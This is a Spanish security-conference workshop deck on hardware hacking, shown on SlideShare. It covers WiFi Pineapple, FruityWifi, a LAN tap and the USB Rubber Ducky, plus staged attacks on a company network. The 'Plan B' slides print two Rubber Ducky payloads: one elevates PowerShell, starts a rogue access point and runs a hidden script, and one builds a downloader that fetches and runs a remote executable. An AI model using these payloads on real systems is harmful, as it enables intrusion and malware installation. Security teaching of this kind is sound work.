SlideShare ist ein Scribd-Unternehmen logo
1 von 56
Jaime Álvarez y Roberto García
Hardware Hacking
Except where otherwise noted, this work is licensed under:
http://creativecommons.org/licenses/by-nc-sa/3.0/
2
3
¿Quiene$ $omo$?
Jaime Álvarez:
• Es un apasionado del mundo de la Informática, siempre ha estado muy
relacionado con la Seguridad Informática y la Calidad del Software.
• Ha trabajado durante muchos años en el departamento de Calidad del
Software y Administración de Sistemas en empresas estatales y privadas .
• Es componente de Bugtraq- Team, un proyecto que está dedicándose a la
implantación de un Sistema Operativo orientado a la Seguridad
Informática.
• Ha impartido talleres sobre hardware hacking en diversas conferencias.
Roberto García:
• Es consultor de seguridad en InnotecSystem. Cuenta con más de 10 años
de experiencia como Administrador de sistemas Windows, trabajando
para empresas multinacionales líderes del sector. Es MCSA de Microsoft
2012 Server.
• Es autor del blog 1gbdeinformacion, ganador del premio “Héroe Digital”
de ESET en 2013 y finalista en 2014.
Hardware Hacking –Piñas, Alfas y demás…
Leganés
12-13 Febrero
2015
4
Hardware Hacking
¿¡ Por que este taller !?
“Estamos acostumbrados a
usar los medios (...) como
algo comunitario sin tener
en cuenta los peligros
existentes... no solo
descuidando nuestra
privacidad y seguridad, si
no también nuestras
obligaciones respecto a
estas...”
Hardware Hacking
¿Que es el Hardware Hacking?
● Herramientas que se basan en hardware para facilitar
el trabajo en un “escenario” tanto ofensivo como
defensivo.
● Las herramientas se sustentan por un firmware y/o un
software interno o externo.
● Suelen ser herramientas multidisciplinares.
● Hardware y software pre-configurado y de fácil uso.
● Interfaces muy intuitivas.
● Normalmente portables y/o autónomas.
Throwing Star LAN Tap
● Hardware Hacking puro (no requiere de
software)
● Pasivo (No alimentado)
● Monitoriza BASE10-T, 100BASE-T y RS-
232 DB9 (puerto serie)
● Puede monitorizar 1000BASE-T
(renegociando la velocidad)
● Dos condensadores pF 220 para hacer
el bypass del par extra que requiere el
1000BASE-T
● Los puertos J3 y J4 son solo receptores
● Dos jacks RJ45 para la red
monitorizada (I/O)
● Dos jacks RJ45 independientes para la
monitorización ( J1-J3 / J2-J4)
WIRELESS HARDWARE
HACKING
Firmware utilizado:
● OpenWRT o DD-WRT (uso comercial)
● Modificaciones de OpenWRT
¿Por que OpenWRT?
● Costes / Licencia GPLv2
● Ultralijero y compacto.
● Firmware adaptable (+3500 paquetes de
software)
● Diseñado para sistemas embebidos
Beini WIFIROBIN 2
Especificaciones Técnicas:
● Chipset Atheros AR9331 400Mhz
● 1x IEEE 802.11b/g/n
● 2x Ethernet 100BASE-T
● 1x USB (multi-disciplinar)
● Software OpenWRT (Beini)
● Alimentación Externa 5V/2A
● Antena alta ganancia (5dB) PR-SMA
● Soporta WEP, WPA y WPA2
● Función de Router, Punto de
Acceso, modo repetidor.
● Cracking WEP y WPA
Beini WIFIROBIN 2
Características técnicas:
● Router
● Punto de Acceso (AP)
● Repetidor
● Recuperación claves WEP y WAP
La recuperación de claves WEP se hace
mediante la suite aircrack con inyección
de paquetes. Sin embargo de las
claves WAP se hace necesario un
diccionario que podemos ampliar por
USB ya que se realiza mediante ataque
de Fuerza Bruta.
PINEAPPLE MARK IV
Especificaciones:
● OpenWRT modificado
● Chip: 400 MHz MIPS Atheros
AR9331 (IEEE) 802.11 b/g/n)
8Mb RAM / 32Mb ROM
● 1x USB
● 2x 100BASE-T Ethernet (LAN / WAN)
● 1X botón “WPS” configurable a 5
acciones distintas (según
pulsaciones)
● Ya no tiene soporte oficial
ALFA AP121U ==
MARK IV
=
=
=
ALFA NETWORK AP121U /
HORNET-UB
● La tarjeta ALFA AP121U se
basa en la placa HORNET-UB
(existen 2 modelos)
● Modelo con Memoria Flash
8M/32M
● U-BOOT (bootloader)
● Soporta OpenWRT
● Modulo conversor USB
2.0 a TTL UART 6PIN
CP2102
● Flash Firmware a
Pineapple Mark IV
PINEAPPLE MARK IV
WiFi Pineapple Mark IV es un dispositivo que permite
realizar ataques man-in-the-middle, Karma, DNS
Spoofing, SSLstrip, desautentification, tcpdump, incluso
ataques de Phishing. La versatilidad se encuentra en la
posibilidad de adaptar nuestro dispositivo mediante
infusiones.
Las Infusiones son “añadidos” que podremos
programar nosotros mismos o descargados del
Pineapple Bar. La infusiones mas conocida de este
dispositivo son KARMA y SSLstrip.
MARK IV GUI
PINEAPPLE MARK IV
KARMA es un set de herramientas para la evaluación de
clientes inalámbricos en distintas capas. Las herramientas
de descubrimiento a través de Wireless sniffing, captan
los clientes cercanos y sus redes preferidas mediante la
escucha pasiva de paquetes Probe Request.
POC MARK IV / KARMA
RASPBERRY PI (FruityWifi)
FRUITYWIFI
● Desarrollador: xtr4nge
● RaspDebian con Pwnpi
● https://github.com/xtr4nge/FruityWifi/
RASPBERRY B / B+
● ARM 700 MHz (ARM11)
● 512 MiB (compartidos con la
GPU)
● HDMI
● RCA / HDMI / DSI
● 3,5mm Audio Jack
● 8 x GPIO, SPI, I²C, UART
● 5v microUSB
● 2 / 4 USB 2.0
FruityWifi
FruityWifi : es una herramienta de código abierto para auditoria de redes
wireless. Permite desplegar rápida y fácilmente ataques avanzados
utilizando la interfaz web o enviándole mensajes. Inicialmente la aplicacion
fue creada para utilizarse con una Raspberry-Pi, pero puede ser instalada
en cualquier sistema basado en Debian.
FruityWifi : se compone de módulos para darle más flexibilidad. Algunos de
los modulos disponibles son URLsnarf, DNSspoof, Kismet, mdk3, ngrep,
nmap, Squid3 y SSLstrip (con funcionalidades para inyectar código), Captive
Portal, AutoSSH, Meterpreter, Tcpdump, etc...
NOVEDAD : FruityWifi v2.0 trae muchas novedades. Una nueva
interfaz, nuevos módulos, soporte para chipsets Realtek, soporte
para Mobile Broadband (3G/4G), un nuevo panel de configuración, y
más.
FruityWifi 2.0 Gui / Modulos
FruityWifi - WHATSapp
POC MARK IV / sslstrip
POC MARK IV / Phishing
24
PINEAPPLE MARK
V
En Noviembre de 2013 se sacó un nuevo
hardware más avanzado con dos antenas de red
como se ha visto.
La GUI del sistema se ha renovado
completamente y está en continua evolución
debido a que es el sistema mas actual y está
bajo soporte.
Debido al puerto de expansión se espera que
este modelo sea mas duradero y ya han salido
nuevos gadgets, como puede ser una caja para
contener dos Mark V conectadas en red, una
placa de expansión para controladores externos
o cajas de ocultación parecidas a “la alarma de
mi casa”.
PINEAPPLE MARK V
● 1x IEEE 802.11b/g/n Radio, AR9331
● 1x IEEE 802.11a/b/g Radio, RTL8187
● Procesador MIPS a400Mhz
● Memoria 64MB DDR2
● Memoria flash 16MB
● 1x USB 2.0
● 1x 100BASE-T Ethernet.
● Ranura Micro-SD
● Modos de arranque mediante
Switches
● Indicadores LED
● Puerto de Expansión
● Serial TTL
● OpenWRT modificado y FailSave
PINEAPPLE MARK V
GUI - MARK V
MARK V / poc - PINEAPP
MARK V / poc - ccupineapple
MARK V / poc - Evilportal
MARK V / POC - ADS-B tracker
USB RUBBER
DUCKY
Especificaciones:
● 60Mhz 32-bit CPU
● Botón de repetición
● Indicador LED
● 1X USB Tipo A 2.0
● Puerto Micro-SD
(128Mb)
● Carcasa de ocultación
USB RUBBER
DUCKY
Características técnicas:
● Soporta Multi HID (12 idiomas)
● Firmware amoldable
● Encoder Multiplataforma
● Soportado para Windows /
Unix / OSX / Android / IOS
● Encoder con soporte de
múltiples comandos
(Alt+Contol+Supr)
● VID & PID manipulables
USB RUBBER
DUCKY
DESGLOSE DE COMANDOS del
Encoder:
● DELAY x- Espera x milisegundos
● STRING xxx – Escribe xxx
● GUI – Tecla Windows
● GUI R – Windows + R (ejecutar)
● Command – Tecla de comando OSX
● ENTER – Intro
● SPACE – Espacio
● REPEAT x – Repite comando anterior
x veces
● CAPS |CAPSLOCK – Bloqueo
Mayúsculas
● UP | UPARROW – Tecla arriba
● DOWN | DOWNARROW –
Tecla abajo
● LEFT | LEFTARROW – Tecla
izquierda
● RIGHT | RIGHTARROW – Tecla
derecha
● SHIFT – Shift
● DEL – Borrar
● CONTROL – Control
USB RUBBER
DUCKY
OTRO FIRMWARE DISPONIBLE:
● duck.hex (Duck(Original))
● usb.hex (FAT Duck)
● m_duck.hex (Detour Duck (formerly
Naked Duck))
● c_duck.hex (Twin Duck)
● cm_duck.hex alpha(unamed)
PoC Rubber DUCKY: UBUNTU
14.04
Seguridad PERIMETRAL
Seguridad PERIMETRAL
Seguridad PERIMETRAL
 No se establece una
política de actualizaciones.
 No se establece una
política de configuraciones
en el router.
 No se realiza “hardering”
sobre la red local,
servidores, ni equipos de
trabajo.
 Ni que pensar del “Bring
your own device”
ES HORA DE
VOLVERSE EL
MALO
;-P
POC SEGUIMIENTO
PINEAP
POC Seguimiento INFORMACIÓN
POC ANALIZANDO REDES
POC ATAQUE 1 (EL PLATO)
POC ATAQUE 1 (RECETA)
Material necesario:
 1 Drone
 1 Piña o más... (añadir mas piñas para ocultar “el
sabor”)
 1 PC
 Antenas lo suficientemente potentes.
POC ATAQUE 2 (Preparando la piña)
INFUSIONES y MeDIOS:
 Infusión WPS
 Modo cliente
 PC
Objetivo:
 Posicionar y controlar nuestra piña lo mas cerca del
router de la empresa.
 Aprovechar una mala configuración para conectarnos
como usuarios legítimos en la red.
POC ATAQUE 1 (COCINANDO)
 Piña1 Wlan0 ataca wps
 Piña2 Wlan1 conecta modo
cliente con Piña1 Wlan0-1 para
control (red protegida WPA2
SSL)
 Piña2 Wlan0-1 o Piña2 Ethernet
quedan libres para control de
Piña2 desde nuestro PC y de ahí
tendremos acceso a Piña1
Wlan0-1
 Una vez finalizado el ataque
WPS de Piña1 conectamos
Piña1 Wlan1 en modo cliente
con WlanVictima dandonos
acceso a Piña1 desde Piña1
Wlan0-1 a traves de Piña2
Wlan1 y Piña2 Wlan0-1 a su vez
desde el PC.
POC Ataque 1 (RESULTADO)
POC ATAQUE 2 (PLAN B)
POC PLAN B PATO 1
DELAY 750
GUI m
GUI r
DELAY 500
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 500
ALT s
DELAY 500
ENTER
STRING netsh wlan set hostednetwork
ssid=SSIDFALSO key=Clave+Falsa
ENTER
STRING netsh wlan start hostednetwork
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL G
DELAY 500
STRING C:Windowsconfig-25381.ps1
ENTER
DELAY 500
ALT F4
DELAY 500
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 500
ALT s
DELAY 500
STRING mode con:cols=14 lines=1
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 500
STRING powershell.exe -windowstyle hidden -File C:Windowsconfig.ps1
GUI l
ENTER
POC PLAN B PATO 2
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
ENTER
DELAY 400
STRING copy con download.vbs
ENTER
STRING Set args = WScript.Arguments:a = split(args(0),
"/")(UBound(split(args(0),"/")))
ENTER
STRING Set objXMLHTTP =
CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET",
args(0), false:objXMLHTTP.send()
ENTER
STRING If objXMLHTTP.Status = 200 Then
ENTER
STRING Set objADOStream =
CreateObject("ADODB.Stream"):objADOStream.Open
ENTER
STRING objADOStream.Type = 1:objADOStream.Write
objXMLHTTP.ResponseBody:objADOStream.Position = 0
ENTER
STRING Set objFSO =
Createobject("Scripting.FileSystemObject"):If
objFSO.Fileexists(a) Then objFSO.DeleteFile a
ENTER
STRING objADOStream.SaveToFile a:objADOStream.Close:Set
objADOStream = Nothing
ENTER
STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing
ENTER
CTRL z
ENTER
STRING cscript download.vbs <METEMOS LA URL AQUI>
ENTER
STRING <METEMOS EL ARCHIVO .EXE AQUI>
ENTER
STRING exit
ENTER
POC ATAQUE 3 (PLAN C)
Usando el ambientador...
POC ATAQUE 3 (PLAN C)
Ocultando el Olor
Foto de David de Roman
OTRO HARDWARE
Teensy v3.1 HackRF One
Para aladdin gurbanov
Persona, hacker y compañero.
MUCHAS
GRACIAS!
Jaime Álvarez de Aldecoa
Twitter: @KioArdetroya
E-mail: jaime.alvarezdealdecoa@gmail.com
Roberto García Amoriz
Twitter: @1GbDeInfo
E-mail: 1gbdeinformacion@rogaramo.com
Blog: www.1gbdeinformacion.com

Weitere ähnliche Inhalte

Was ist angesagt?

Creacion de un IPS utilizando Linux y hardware Soekris
Creacion de un IPS utilizando Linux y hardware SoekrisCreacion de un IPS utilizando Linux y hardware Soekris
Creacion de un IPS utilizando Linux y hardware Soekrisozikox
 
Herramientas de diagnostico de pc
Herramientas de diagnostico de pcHerramientas de diagnostico de pc
Herramientas de diagnostico de pckkktock
 
Barcamp 2015 - Integración de proyectos embebidos utilizando Arduino, Raspbe...
Barcamp 2015 -  Integración de proyectos embebidos utilizando Arduino, Raspbe...Barcamp 2015 -  Integración de proyectos embebidos utilizando Arduino, Raspbe...
Barcamp 2015 - Integración de proyectos embebidos utilizando Arduino, Raspbe...Carlos Camacho
 
Ficha Técnica Motherboard Gigabyte G1-Sniper-H6 Rev 1.0
Ficha Técnica Motherboard Gigabyte G1-Sniper-H6 Rev 1.0Ficha Técnica Motherboard Gigabyte G1-Sniper-H6 Rev 1.0
Ficha Técnica Motherboard Gigabyte G1-Sniper-H6 Rev 1.0RaGaZoMe
 
Ficha Técnica Motherboard Gigabyte GA-X99-Gaming 7 WIFI Rev 1.0
Ficha Técnica Motherboard Gigabyte GA-X99-Gaming 7 WIFI Rev 1.0Ficha Técnica Motherboard Gigabyte GA-X99-Gaming 7 WIFI Rev 1.0
Ficha Técnica Motherboard Gigabyte GA-X99-Gaming 7 WIFI Rev 1.0RaGaZoMe
 
Ficha técnica motherboard as rock z68 extreme7 gen3
Ficha técnica motherboard as rock z68 extreme7 gen3Ficha técnica motherboard as rock z68 extreme7 gen3
Ficha técnica motherboard as rock z68 extreme7 gen3RaGaZoMe
 
Overview For Thunderbird Casino 2007
Overview For Thunderbird Casino 2007Overview For Thunderbird Casino 2007
Overview For Thunderbird Casino 2007danielatcrockett
 
Ficha técnica mother board intel dx58s02
Ficha técnica mother board intel dx58s02Ficha técnica mother board intel dx58s02
Ficha técnica mother board intel dx58s02RaGaZoMe
 
Workshop iniciacion arduino d1
Workshop iniciacion arduino d1Workshop iniciacion arduino d1
Workshop iniciacion arduino d1José Pujol Pérez
 
Ficha Técnica Motherboard Intel DH87MC
Ficha Técnica Motherboard Intel DH87MCFicha Técnica Motherboard Intel DH87MC
Ficha Técnica Motherboard Intel DH87MCRaGaZoMe
 
Alarma arduino wavecom programa y esquema numeros borrados 48 pag
Alarma arduino wavecom programa y esquema numeros borrados 48 pagAlarma arduino wavecom programa y esquema numeros borrados 48 pag
Alarma arduino wavecom programa y esquema numeros borrados 48 pagjoaquinin1
 
Programación del ESP8266 con el IDE de Arduino
Programación del ESP8266 con el IDE de ArduinoProgramación del ESP8266 con el IDE de Arduino
Programación del ESP8266 con el IDE de ArduinoVíctor R. Ruiz
 
Sistema de localización de objetos basado en tecnología de Código Abierto de ...
Sistema de localización de objetos basado en tecnología de Código Abierto de ...Sistema de localización de objetos basado en tecnología de Código Abierto de ...
Sistema de localización de objetos basado en tecnología de Código Abierto de ...RFIC-IUMA
 
Toshiba m30 x sp111
Toshiba m30 x sp111Toshiba m30 x sp111
Toshiba m30 x sp111edderssito
 
Especificaciones Técnicas IDTK
Especificaciones Técnicas IDTKEspecificaciones Técnicas IDTK
Especificaciones Técnicas IDTKCarles Parrilla
 
Hardware Hacking con Arduino y RAD
Hardware Hacking con Arduino y RADHardware Hacking con Arduino y RAD
Hardware Hacking con Arduino y RADestialvarez
 

Was ist angesagt? (19)

Creacion de un IPS utilizando Linux y hardware Soekris
Creacion de un IPS utilizando Linux y hardware SoekrisCreacion de un IPS utilizando Linux y hardware Soekris
Creacion de un IPS utilizando Linux y hardware Soekris
 
Herramientas de diagnostico de pc
Herramientas de diagnostico de pcHerramientas de diagnostico de pc
Herramientas de diagnostico de pc
 
Barcamp 2015 - Integración de proyectos embebidos utilizando Arduino, Raspbe...
Barcamp 2015 -  Integración de proyectos embebidos utilizando Arduino, Raspbe...Barcamp 2015 -  Integración de proyectos embebidos utilizando Arduino, Raspbe...
Barcamp 2015 - Integración de proyectos embebidos utilizando Arduino, Raspbe...
 
Presentación2
Presentación2Presentación2
Presentación2
 
Ficha Técnica Motherboard Gigabyte G1-Sniper-H6 Rev 1.0
Ficha Técnica Motherboard Gigabyte G1-Sniper-H6 Rev 1.0Ficha Técnica Motherboard Gigabyte G1-Sniper-H6 Rev 1.0
Ficha Técnica Motherboard Gigabyte G1-Sniper-H6 Rev 1.0
 
Ficha Técnica Motherboard Gigabyte GA-X99-Gaming 7 WIFI Rev 1.0
Ficha Técnica Motherboard Gigabyte GA-X99-Gaming 7 WIFI Rev 1.0Ficha Técnica Motherboard Gigabyte GA-X99-Gaming 7 WIFI Rev 1.0
Ficha Técnica Motherboard Gigabyte GA-X99-Gaming 7 WIFI Rev 1.0
 
Perifericoss
PerifericossPerifericoss
Perifericoss
 
Ficha técnica motherboard as rock z68 extreme7 gen3
Ficha técnica motherboard as rock z68 extreme7 gen3Ficha técnica motherboard as rock z68 extreme7 gen3
Ficha técnica motherboard as rock z68 extreme7 gen3
 
Overview For Thunderbird Casino 2007
Overview For Thunderbird Casino 2007Overview For Thunderbird Casino 2007
Overview For Thunderbird Casino 2007
 
Ficha técnica mother board intel dx58s02
Ficha técnica mother board intel dx58s02Ficha técnica mother board intel dx58s02
Ficha técnica mother board intel dx58s02
 
Workshop iniciacion arduino d1
Workshop iniciacion arduino d1Workshop iniciacion arduino d1
Workshop iniciacion arduino d1
 
Ficha Técnica Motherboard Intel DH87MC
Ficha Técnica Motherboard Intel DH87MCFicha Técnica Motherboard Intel DH87MC
Ficha Técnica Motherboard Intel DH87MC
 
Alarma arduino wavecom programa y esquema numeros borrados 48 pag
Alarma arduino wavecom programa y esquema numeros borrados 48 pagAlarma arduino wavecom programa y esquema numeros borrados 48 pag
Alarma arduino wavecom programa y esquema numeros borrados 48 pag
 
Programación del ESP8266 con el IDE de Arduino
Programación del ESP8266 con el IDE de ArduinoProgramación del ESP8266 con el IDE de Arduino
Programación del ESP8266 con el IDE de Arduino
 
Los Diferentes Arduinos y Sus Caracteristicas
Los Diferentes Arduinos y Sus CaracteristicasLos Diferentes Arduinos y Sus Caracteristicas
Los Diferentes Arduinos y Sus Caracteristicas
 
Sistema de localización de objetos basado en tecnología de Código Abierto de ...
Sistema de localización de objetos basado en tecnología de Código Abierto de ...Sistema de localización de objetos basado en tecnología de Código Abierto de ...
Sistema de localización de objetos basado en tecnología de Código Abierto de ...
 
Toshiba m30 x sp111
Toshiba m30 x sp111Toshiba m30 x sp111
Toshiba m30 x sp111
 
Especificaciones Técnicas IDTK
Especificaciones Técnicas IDTKEspecificaciones Técnicas IDTK
Especificaciones Técnicas IDTK
 
Hardware Hacking con Arduino y RAD
Hardware Hacking con Arduino y RADHardware Hacking con Arduino y RAD
Hardware Hacking con Arduino y RAD
 

Andere mochten auch

Hardware Attacks and Security
Hardware Attacks and SecurityHardware Attacks and Security
Hardware Attacks and SecurityPriyanka Aash
 
Ud4 Seguridad del hardware
Ud4 Seguridad del hardwareUd4 Seguridad del hardware
Ud4 Seguridad del hardwarecarmenrico14
 
Unidad 3: Seguridad lógica
Unidad 3: Seguridad lógicaUnidad 3: Seguridad lógica
Unidad 3: Seguridad lógicacarmenrico14
 
Unidad 1: Introducción a la seguridad informática
Unidad 1: Introducción a la seguridad informáticaUnidad 1: Introducción a la seguridad informática
Unidad 1: Introducción a la seguridad informáticacarmenrico14
 
Unidad 2: Seguridad física
Unidad 2: Seguridad físicaUnidad 2: Seguridad física
Unidad 2: Seguridad físicacarmenrico14
 
9.1 security attacks
9.1 security attacks9.1 security attacks
9.1 security attacksEdwin Vargas
 
Web Application Firewall (WAF) DAST/SAST combination
Web Application Firewall (WAF) DAST/SAST combinationWeb Application Firewall (WAF) DAST/SAST combination
Web Application Firewall (WAF) DAST/SAST combinationTjylen Veselyj
 
Metodologia para detectar vulnerabilidades de los activos
Metodologia para detectar vulnerabilidades de los activosMetodologia para detectar vulnerabilidades de los activos
Metodologia para detectar vulnerabilidades de los activosAlexander Velasque Rimac
 
introduccion Hacking etico
introduccion Hacking eticointroduccion Hacking etico
introduccion Hacking eticoYulder Bermeo
 
Firewall - IPCop
Firewall - IPCopFirewall - IPCop
Firewall - IPCopFaniMR
 
Comparativa Firewall: IPCop vs. pfSense
Comparativa Firewall: IPCop vs. pfSenseComparativa Firewall: IPCop vs. pfSense
Comparativa Firewall: IPCop vs. pfSenseIrontec
 
hardware and software: Seguridad
hardware and software: Seguridadhardware and software: Seguridad
hardware and software: Seguridadconkyman
 

Andere mochten auch (20)

Firewall hw
Firewall hwFirewall hw
Firewall hw
 
¿Por qué la Virtualización?
¿Por qué la Virtualización?¿Por qué la Virtualización?
¿Por qué la Virtualización?
 
Seguridad so
Seguridad soSeguridad so
Seguridad so
 
Presentación Web application firewall
Presentación Web application firewallPresentación Web application firewall
Presentación Web application firewall
 
Hardware Attacks and Security
Hardware Attacks and SecurityHardware Attacks and Security
Hardware Attacks and Security
 
Pkk
PkkPkk
Pkk
 
Hardware para hacking (2011)
Hardware para hacking (2011)Hardware para hacking (2011)
Hardware para hacking (2011)
 
Ud4 Seguridad del hardware
Ud4 Seguridad del hardwareUd4 Seguridad del hardware
Ud4 Seguridad del hardware
 
Los atacantes y sus herramientas
Los atacantes y sus herramientasLos atacantes y sus herramientas
Los atacantes y sus herramientas
 
Unidad 3: Seguridad lógica
Unidad 3: Seguridad lógicaUnidad 3: Seguridad lógica
Unidad 3: Seguridad lógica
 
Unidad 1: Introducción a la seguridad informática
Unidad 1: Introducción a la seguridad informáticaUnidad 1: Introducción a la seguridad informática
Unidad 1: Introducción a la seguridad informática
 
Unidad 2: Seguridad física
Unidad 2: Seguridad físicaUnidad 2: Seguridad física
Unidad 2: Seguridad física
 
9.1 security attacks
9.1 security attacks9.1 security attacks
9.1 security attacks
 
Web Application Firewall (WAF) DAST/SAST combination
Web Application Firewall (WAF) DAST/SAST combinationWeb Application Firewall (WAF) DAST/SAST combination
Web Application Firewall (WAF) DAST/SAST combination
 
Metodologia para detectar vulnerabilidades de los activos
Metodologia para detectar vulnerabilidades de los activosMetodologia para detectar vulnerabilidades de los activos
Metodologia para detectar vulnerabilidades de los activos
 
introduccion Hacking etico
introduccion Hacking eticointroduccion Hacking etico
introduccion Hacking etico
 
Firewall - IPCop
Firewall - IPCopFirewall - IPCop
Firewall - IPCop
 
Comparativa Firewall: IPCop vs. pfSense
Comparativa Firewall: IPCop vs. pfSenseComparativa Firewall: IPCop vs. pfSense
Comparativa Firewall: IPCop vs. pfSense
 
hardware and software: Seguridad
hardware and software: Seguridadhardware and software: Seguridad
hardware and software: Seguridad
 
Seguridad logica fisica
Seguridad logica fisicaSeguridad logica fisica
Seguridad logica fisica
 

Ähnlich wie T3ch fest leganes_final

CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínCPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínWebsec México, S.C.
 
Hack like a pro with custom gadgets - Bitup2018
Hack like a pro with custom gadgets - Bitup2018Hack like a pro with custom gadgets - Bitup2018
Hack like a pro with custom gadgets - Bitup2018Alejandro Quesada
 
Ingenieria Reversa de Puertos Series con algo de Python
Ingenieria Reversa de Puertos Series con algo de PythonIngenieria Reversa de Puertos Series con algo de Python
Ingenieria Reversa de Puertos Series con algo de PythonAlfonso de la Guarda Reyes
 
Hack like a Pro with a custom gadgets - Taller BitUp 2018
Hack like a Pro with a custom gadgets - Taller BitUp 2018Hack like a Pro with a custom gadgets - Taller BitUp 2018
Hack like a Pro with a custom gadgets - Taller BitUp 2018Javier García Antón
 
Inseguridad wireless-sfd- final
Inseguridad wireless-sfd- finalInseguridad wireless-sfd- final
Inseguridad wireless-sfd- finalsp1b0t
 
381429156-PLC-DVP-Fundamentals-RevB.pdf
381429156-PLC-DVP-Fundamentals-RevB.pdf381429156-PLC-DVP-Fundamentals-RevB.pdf
381429156-PLC-DVP-Fundamentals-RevB.pdfelkinmeza1
 
2016 11-09-urjc-fpgas-libres
2016 11-09-urjc-fpgas-libres2016 11-09-urjc-fpgas-libres
2016 11-09-urjc-fpgas-libresobijuan_cube
 
Seguridad inalámbrica
Seguridad inalámbricaSeguridad inalámbrica
Seguridad inalámbricatena10
 
Comoconstruimos bogota mesh.org
Comoconstruimos bogota mesh.orgComoconstruimos bogota mesh.org
Comoconstruimos bogota mesh.orgBartOc3
 
Determinar los componentes de una red e identificar y determinar los equipos ...
Determinar los componentes de una red e identificar y determinar los equipos ...Determinar los componentes de una red e identificar y determinar los equipos ...
Determinar los componentes de una red e identificar y determinar los equipos ...George Romero Baltazar
 
Programadores (hardware)
Programadores (hardware)Programadores (hardware)
Programadores (hardware)Yair Hernandez
 
Tema 1 2 - placa base
Tema 1   2 - placa baseTema 1   2 - placa base
Tema 1 2 - placa basejctorrest
 
Laura patricia-flores-dominguez
Laura patricia-flores-dominguezLaura patricia-flores-dominguez
Laura patricia-flores-dominguezlaura flures
 
Analisis de factibilidad
Analisis de factibilidadAnalisis de factibilidad
Analisis de factibilidadsaydo2007
 

Ähnlich wie T3ch fest leganes_final (20)

CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínCPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
 
Marta G y Marta S
Marta G y Marta SMarta G y Marta S
Marta G y Marta S
 
Hack like a pro with custom gadgets - Bitup2018
Hack like a pro with custom gadgets - Bitup2018Hack like a pro with custom gadgets - Bitup2018
Hack like a pro with custom gadgets - Bitup2018
 
Ingenieria Reversa de Puertos Series con algo de Python
Ingenieria Reversa de Puertos Series con algo de PythonIngenieria Reversa de Puertos Series con algo de Python
Ingenieria Reversa de Puertos Series con algo de Python
 
Hack like a Pro with a custom gadgets - Taller BitUp 2018
Hack like a Pro with a custom gadgets - Taller BitUp 2018Hack like a Pro with a custom gadgets - Taller BitUp 2018
Hack like a Pro with a custom gadgets - Taller BitUp 2018
 
Inseguridad wireless-sfd- final
Inseguridad wireless-sfd- finalInseguridad wireless-sfd- final
Inseguridad wireless-sfd- final
 
Informe1 alvaro morales
Informe1 alvaro moralesInforme1 alvaro morales
Informe1 alvaro morales
 
381429156-PLC-DVP-Fundamentals-RevB.pdf
381429156-PLC-DVP-Fundamentals-RevB.pdf381429156-PLC-DVP-Fundamentals-RevB.pdf
381429156-PLC-DVP-Fundamentals-RevB.pdf
 
Ubnt colombia
Ubnt  colombiaUbnt  colombia
Ubnt colombia
 
2016 11-09-urjc-fpgas-libres
2016 11-09-urjc-fpgas-libres2016 11-09-urjc-fpgas-libres
2016 11-09-urjc-fpgas-libres
 
Seguridad inalámbrica
Seguridad inalámbricaSeguridad inalámbrica
Seguridad inalámbrica
 
Proyecto u2 rout-ev2
Proyecto u2 rout-ev2Proyecto u2 rout-ev2
Proyecto u2 rout-ev2
 
Raspberry Pi - Verano2016
Raspberry Pi - Verano2016Raspberry Pi - Verano2016
Raspberry Pi - Verano2016
 
Comoconstruimos bogota mesh.org
Comoconstruimos bogota mesh.orgComoconstruimos bogota mesh.org
Comoconstruimos bogota mesh.org
 
Determinar los componentes de una red e identificar y determinar los equipos ...
Determinar los componentes de una red e identificar y determinar los equipos ...Determinar los componentes de una red e identificar y determinar los equipos ...
Determinar los componentes de una red e identificar y determinar los equipos ...
 
Programadores (hardware)
Programadores (hardware)Programadores (hardware)
Programadores (hardware)
 
Tema 1 2 - placa base
Tema 1   2 - placa baseTema 1   2 - placa base
Tema 1 2 - placa base
 
Laura patricia-flores-dominguez
Laura patricia-flores-dominguezLaura patricia-flores-dominguez
Laura patricia-flores-dominguez
 
Analisis de factibilidad
Analisis de factibilidadAnalisis de factibilidad
Analisis de factibilidad
 
Factibilidad
FactibilidadFactibilidad
Factibilidad
 

Mehr von Rober Garamo

Eres más hackeable de lo que crees
Eres más hackeable de lo que creesEres más hackeable de lo que crees
Eres más hackeable de lo que creesRober Garamo
 
Los peligros de internet
Los peligros de internetLos peligros de internet
Los peligros de internetRober Garamo
 
Contraseñas seguras
Contraseñas segurasContraseñas seguras
Contraseñas segurasRober Garamo
 
Como tener una contraseña segura
Como tener una contraseña seguraComo tener una contraseña segura
Como tener una contraseña seguraRober Garamo
 
Complementando el contro parental III
Complementando  el contro parental IIIComplementando  el contro parental III
Complementando el contro parental IIIRober Garamo
 
Complementando El control parental II de III
Complementando El control parental II de IIIComplementando El control parental II de III
Complementando El control parental II de IIIRober Garamo
 
Complementando el control parental I de III
Complementando el control parental I de IIIComplementando el control parental I de III
Complementando el control parental I de IIIRober Garamo
 
El control parental en Windows 7
El control parental en Windows 7El control parental en Windows 7
El control parental en Windows 7Rober Garamo
 

Mehr von Rober Garamo (11)

Eres más hackeable de lo que crees
Eres más hackeable de lo que creesEres más hackeable de lo que crees
Eres más hackeable de lo que crees
 
Los peligros de internet
Los peligros de internetLos peligros de internet
Los peligros de internet
 
Contraseñas seguras
Contraseñas segurasContraseñas seguras
Contraseñas seguras
 
Xss attacks V2.0
Xss attacks V2.0Xss attacks V2.0
Xss attacks V2.0
 
Xss attacks
Xss attacksXss attacks
Xss attacks
 
Empezando con mac
Empezando con macEmpezando con mac
Empezando con mac
 
Como tener una contraseña segura
